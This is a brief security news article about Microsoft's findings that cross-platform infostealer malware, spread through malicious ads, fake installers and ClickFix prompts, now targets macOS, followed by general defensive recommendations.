Microsoft: Info-Stealing Malware Expands From Windows to macOS

Apple’s macOS has long been perceived as a lower‑risk platform compared with Windows, but the tide is turning. Recent telemetry from Microsoft Defender shows a marked increase in cross‑platform infostealers that exploit the growing popularity of Python and other language runtimes on macOS. Threat actors are repurposing code bases originally written for Windows, compiling them for macOS, and bundling them into seemingly benign DMG installers. This shift reflects a broader industry trend where attackers favor languages that run unchanged across operating systems, allowing rapid expansion of their toolkits without reinventing core functionality.

The campaigns rely heavily on social engineering. Malicious Google Ads, SEO‑poisoned pages and “ClickFix” copy‑paste prompts lure users into executing unsigned scripts or installing fake updates. Once on the system, the malware uses native macOS utilities—AppleScript, curl, and keychain access—to harvest browser passwords, cryptocurrency wallets, and developer credentials. Abuse of trusted communication channels such as WhatsApp and PDF editors further obscures the payload’s origin, while Python‑based components like PXA Stealer enable file‑less execution and easy evasion of signature‑based defenses. The result is a potent blend of credential theft, financial fraud, and potential footholds for deeper enterprise compromise.

Defending against this evolving threat requires a layered approach. Microsoft recommends enabling cloud‑delivered protection, enforcing attack surface reduction rules, and running endpoint detection and response (EDR) in block mode to stop unsigned scripts and suspicious executables. Organizations should monitor for anomalous Terminal activity—Base64 decoding, curl calls, and AppleScript launches—and flag outbound POST requests to unknown domains. User education remains critical: training staff to recognize fake ads, bogus installers, and copy‑paste tricks can cut the initial infection vector. As macOS becomes a more attractive target, enterprises must extend their security controls and visibility to cover cross‑platform malware and platform‑abuse tactics.